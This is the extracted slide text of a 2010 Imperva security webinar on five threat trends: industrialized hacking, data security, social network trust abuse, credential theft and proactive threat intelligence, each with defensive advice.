Top 5 Security Trends for 2010
Noa
Bar
-
Yosef
, Security Research Engineer,
Imperva
Focuses on
Application Data Security and Compliance
Application Defense Center (ADC)
+
Research organization headed by Amichai Shulman
+
Security analysis
+
Vulnerability discovery
+
Compliance expertise
+
Threat research
+
Education
Imperva
Background
MS
Agenda
Scorecard for 2009 Security Trends
2010 Top Security Trends
+
Emerging threats, vendor security notification policies, and new
security tactics
+
Strategies to mitigate today’s security threats
Q&A
BC
Trend
Score
1
Disclosure becoming irresponsible
A
-
2
Economics to affect threat level
A
3
Surge of cloud related threats
C
4
Evolution of automated attacks
A+
5
Increased threat business
applications (e.g. SAP)
C
6
Proliferation of CSRF
D
Scorecard for 2009 Security Trends
#1
-
The Industrialization of Hacking
Hacking is becoming
a profitable
industry
The foundations of any industry can be
identified within hacking
+
Building layered roles (supply chain)
+
Horizontal expertise
+
Resource optimization
+
Automation
Individual or political hacking haven’t
ceased; but they have become a secondary
threat
The Industrialization of Hacking
Layered Roles
Detect vulnerabilities and develop
exploits
+
Hardcore “hackers” with strong technical
capabilities
+
Keep clean of actual targets
+
Provide the building blocks for others
Grow botnets
+
Groups devoted to controlling as many
zombies as possible
+
Complex operations (will discuss later)
+
Provide zombies from the botnet for use
by perpetrators
The Industrialization of Hacking
Layered Roles (cont.)
Exploit targets
+
Groups that make use of zombies for various purposes
+
Send spam
+
Collect data
+
Inflict
DoS
Consumers
+
Monetize information
–
Credit card fraud
–
Identity theft
+
Advertize through spam
+
Blackmail
The Industrialization of Hacking
Resource Optimization
“Nothing is thrown to the garbage”
Each workstation or application, once
compromised, is exploited in one way or
another as part of the industrial food chain
Compromised Applications
+
Direct value (fund transfer, credit card information,
etc.)
+
Indirect value (credentials to other systems)
+
Malware distribution
+
Blackhat SEO
+
Command & Control
The Industrialization of Hacking
Resource Optimization (cont.)
Workstations
+
Keylogger for grabbing credentials
+
Specialized malware for man
-
in
-
the
-
browser attacks
+
General purpose Trojan to use as part of a botnet
+
Relay into internal networks
The Industrialization of Hacking
Automation
Core of the industrial process
–
growing botnets and
exploiting targets
–
is mostly automated
Selecting target applications through search engines
Compromise applications using captured zombies
+
Configuration and commands distributed through forums and web
pages
Sometimes the compromise is
through search engine abuse
The Industrialization of Hacking
Automation (cont.)
Templates and kits exist for everything
+
Remote file include
+
Phishing of various applications
+
Botnet
client (ASPROX, Zeus,
Clampi
, etc.)
Looking at the numbers from attack campaigns
clearly shows the power of automation
+
Last month we have heard of 132K sites
compromised in one campaign
+
We have tracked a similar campaign 3 weeks prior
and saw the same flaw exploited in the same way
over hundreds of sites
Techniques are becoming more sophisticated
+
Randomized DNS in order to avoid C&C hijacking
The Industrialization of Hacking
Our Advice
We are no longer fighting the script kiddies or sporadic
hacking attempts
–
we are fighting Hackers Inc.
Cannot hide from the problem.
+
Small and large applications alike
+
Servers or workstations
+
It’s not personal.
Smaller organizations
+
Must start paying attention to application security
+
Either directly or through their hosting providers
Organizations must look for tools to help them detect and
mitigate automation properly
#2
–
From Application Security to Data Security
The 90s’ were all about network related security problems
(connecting enterprise networks to the Internet) and network
security solutions (Network Firewall)
Throughout this decade we’ve seen a shift of activity towards
web application attacks
+
Network security becomes commodity and network attacks are
harder to execute
+
At the turn of the century eCommerce and online services took a
steep climb. Attacker motivation increases as applications expose
more information and more functionality.
+
It is far easier to access data through applications designed to
manipulate it
From application security to data security
Web Application Security is No Longer Enough
Internal threat still prominent
Many internal applications are not web based
Web application security can be effectively applied to major
internal applications but not all of them
Many time internal users have (authorized) direct access to
the database
Once data from application flows into a workstation its on the
loose
Regulations require that specific types of data be tracked
From applications security to data security
Continuous Data Security
Track access to sensitive and regulated data throughout its
lifecycle
Basic information lifecycle
+
Most sensitive and regulated data can be traced back to structured
storage (SQL databases)
+
Sensitive information may be transformed into unstructured format
and placed in document storage and management system (File
shares, MS Sharepoint, EMC Documentum)
+
Data is processed in workstations and may leave the enterprise
boundaries through email, WebMail, file transfer and physical media
Controls around individual data repositories
+
Database access monitoring
+
File activity monitoring
Controls to track data in process
+
Next generation of DLP products
+
Integrate with DRM
Collaboration between data security products
+
Policies expressed in terms of information type based on content,
rather than table and file names
+
Track specific pieces of information as they leave the database, flow
through web applications, transformed into files and flow through
outgoing channels.
From applications security to data security
Our Advice
#3
–
Social networks expose larger societies
Past: Specific parts of the population
+
Young adults of the Internet generation
Today / Future: Everyone and their
dog have a Facebook account
+
Younger, immature audience
–
Kids making their first steps into the virtual
society
+
Conservative adult community
–
People who otherwise have very conservative
web access behavior
+
Senior community
–
People whose trust models are deeply rooted
in the old world (my grandmother)
Social networks expose larger societies
Pandemic Threats
There are three distinctive pillars to social
networks that make them a perfect fit for
online pandemic threats:
+
Huge crowds
+
Inherently expose personal information
+
Built
-
in mechanisms for implicit and explicit trust
generation between loosely coupled individuals
Attackers can push their “merchandise” to larger
unsuspecting crowds with higher than ever success rates
+
Use the implicit trust
+
Abuses the abundance of personal information to create more trust
Social networks expose larger societies
The Evolution of an Octopus
Social networks are becoming social platforms
+
Integrating MMORPG (e.g. Farmville), 3
rd
party apps
+
More opportunities for trust abuse
–
ClickJacking through Farmville gifts
+
Less control over the robustness of integrated applications
Integrating social networks into other domains
+
Google, Bing and Yahoo! integrating Twitter and Facebook results
+
Promoting malware just became
much easier!
Social networks expose larger societies
The Evolution of an Octopus
Integrating social networks into enterprise
+
HR systems, CRM systems
+
Creating a Mobius strip of information, mixing
internal and external trust
Dear Amichai,
We'd like your help to spread the word about our open jobs. If you follow the link below and install this application on your
Fa
cebook profile page, your friends will be able to see, apply and forward our jobs. The best part is that if your friend, or a
fr
iend of a friend, applies for a job and is hired, you will automatically get credit for the employee referral through Jobvite
. Y
ou will be eligible for the referral bonus.
To install the application, please follow this link:
here
Best regards,
Douglas
Dear John,
We'd like your help to spread the word about our open jobs. If you follow the link
below and install this application on your
Facebook
profile page, your friends will
be able to see, apply and forward our jobs. The best part is that if your friend, or a
friend of a friend, applies for a job and is hired, you will automatically get credit for
the employee referral through
Jobvite
. You will be eligible for the referral bonus.
To install the application, please follow this link:
here
Best regards,
Sue
Social networks are all about novelty
+
We can expect them to rush new features out at the expense of
security
+
As more 3
rd
party apps are created we cannot expect those to
consider any security at all
We need tools to help us evaluate trust in huge, dynamic,
virtual societies
+
These are starting to show up as research projects or initial offering
from various vendors
Security tools and policies should be able to build on these
trust systems
Social networks expose larger societies
Our Advice
-
Redefining Trust
#4
–
Credentials are the New Credit Card Numbers
Dramatic surge in the number of data compromise incidents
+
Credit card numbers
+
Personal details
Price levels per single stolen record are constantly dropping
+
Attackers are looking for more profitable targets
We clearly see an increased level of activity around hacking
user credentials for online applications
Application credentials are the new CCNs
Motivation
Credit card numbers are harder to monetize
+
Need to purchase goods and cash those out
Personal details are even harder to monetize
+
Cannot be used in masses
+
Require additional fraud (involving identity theft)
The premise of application credentials
+
Easier to monetize
+
Higher value per record
Application credentials are the new CCNs
Motivation (cont.)
Financial applications
+
Can be easily converted into hard cash through online transactions
(fund transfers, stock trading, etc.)
Enterprise in the cloud (SalesForce.com, GoogleDocs, etc.)
+
Access to sensitive commercial information
+
Can be traded for money, used for fraudulent transactions and even
blackmail
Web mail
+
Direct access to personal details
+
Further access to the above mentioned applications
+
SPAM
Application credentials are the new CCNs
Tools of the Trade
Keyloggers
+
Cleartext passwords
+
Once a computer is infected quality data is flowing in
+
Requires massive infected botnets
Phishing attacks
+
Cleartext passwords
+
Low quality data
+
Low success rates
Application compromise (e.g. SQL injection)
+
Sometimes digested password that need further cracking
+
High quality data
+
Huge numbers
Application credentials are the new CCNs
Our Advice
Protect you web facing applications
+
Defeat attacks
Store digested passwords
+
Defeat exposure in case of compromise
Use safe password recovery procedures
+
Avoid automatic leveraging of another compromise
Include two factor authentication
+
When possible
#5
–
Proactive Security
To date the security concept has been largely reactive
+
Wait for a vulnerability to be disclosed
+
Create a signature (or some other security rule)
+
Cross reference requests against these attack methods, regardless of
their context in time or source
As a consequence security decisions are becoming more
difficult and resource consumption (machine as well as
human) is growing
+
Distinguishing “bad” requests from “good” requests based on request
content alone becomes more difficult and more time consuming
+
Not only machine resources but also human resources as more
decisions cannot be taken automatically
+
This is completely inadequate in world of growing attack rates
Proactive security
Tired of Being a Sitting Duck?
Rather than waiting to be attacked, security research teams
start to proactively look for attacker activity as it is being
initialised over the network
Traditionally used for longer term research, proactive
intelligence operations can be used for immediate security
value:
+
Identify compromised computers being actively exploited to launch
attacks
+
Quickly identify attack campaigns at their early stages
+
Discover 0 day vulnerabilities in the wild rather than in the lab
+
Identify targets of upcoming attacks in advance
Proactive security
Military Intelligence is a Contradiction in Terms*
There are different techniques for gathering timely
intelligence
+
Some techniques, especially related to the SPAM domain have
already been in use for a couple of years
Some technique are based on a network of sensors. Three
basic types of sensors
+
Setting up targets for attacks (fake web applications, mailboxes to
receive spam, etc.)
+
Setting up communication channels for use by attackers (anonymous
proxies, TOR relays)
+
Network sniffers in strategic locations
+
Tap into C&C servers
*Groucho Marx
Proactive security
Military Intelligence (cont.)
Other techniques are more laborious
+
Reverse engineering of new malware to identify C&C servers
+
Hijack domain names intended for use by botnets
+
Tap into hacker discussions in forums and
Existing projects and commercial offerings for various types of
threats (sample):
+
Dshield (General reputation for IPs)
+
ShadowServer (Botnet oriented)
+
Cyveillance (Phishing and compromised servers)
+
Project Honeypot (Spam related)
Proactive security
Our Advice
Engaging in proactive security requires
substantial research resources
–
don’t expect
to do it yourself
Some solutions (mainly around endpoint
security) are incorporating data obtained
through proactive security
Next generation of enterprise solutions will
include integration of data obtained from
proactive security projects and providers
Add proactive security to your wish list when
looking at enterprise solutions
Security Trends that just missed the Top 5
Questions & Answers
ADC Data Security Webinar Series
Enter the password to open this PDF file:
File name:
-
File size:
-
Title:
-
Author:
-
Subject:
-
Keywords:
-
Creation Date:
-
Modification Date:
-
Creator:
-
PDF Producer:
-
PDF Version:
-
Page Count:
-
Preparing document for printing…
0%
Comments 0
Log in to post a comment